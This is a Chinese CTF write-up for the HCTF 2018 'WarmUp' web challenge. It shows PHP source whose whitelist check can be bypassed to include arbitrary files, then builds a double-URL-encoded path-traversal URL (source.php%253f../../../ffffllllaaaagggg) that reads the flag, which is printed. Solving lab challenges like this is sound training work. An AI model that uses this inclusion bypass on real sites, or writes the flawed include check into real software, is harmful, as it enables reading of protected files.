[BUUCTF001]
[HCTF 2018]WarmUp1
去看source.php
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//有一个hint.php
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
//要求$page为字符串,否则返回false
if (in_array($page, $whitelist)) {
return true;
}
//判断$page是否存在于$whitelist数组中,存在则返回true
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
//判断截取后的$page是否存在于$whitelist数组中,截取$page中'?'前部分,存在则返回true
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
//mb_strpos获取位数,mb_substr截取输入元素的前n位
);
if (in_array($_page, $whitelist)) {
return true;
//该参数在白名单里,则return true
}
echo "you can't see it";
return false;
}
}
//判断url解码并截取后的$page是否存在于$whitelist中,存在则返回true
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
)
//如果输入的file非空
//File是字符串 ffffllllaaaagggg
//File 能够通过emm:checkFile
{
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
去看hint.php
若以上四个if语句均未返回值,则返回false
有三个if语句可以返回true,第二个语句直接判断$page,不可用
第三个语句截取’?‘前部分,由于?被后部分被解析为get方式提交的参数,也不可利用
第四个if语句中,先进行url解码再截取,因此我们可以将?经过两次url编码,在服务器端提取参数时解码一次,checkFile函数中解码一次,仍会解码为’?’,仍可通过第四个if语句校验。(’?‘两次编码值为’%253f’),构造url:/source.php?file=source.php%253f…/ffffllllaaaagggg
经过测试发现无返回值,这可能是因为我们不知道ffffllllaaaagggg文件存放的具体位置
所以依次增加…/,
/source.php?file=source.php%253f…/…/…/…/…/ffffllllaaaagggg
得到
flag{54dede96-f081-4e11-a822-074ca5beed6f}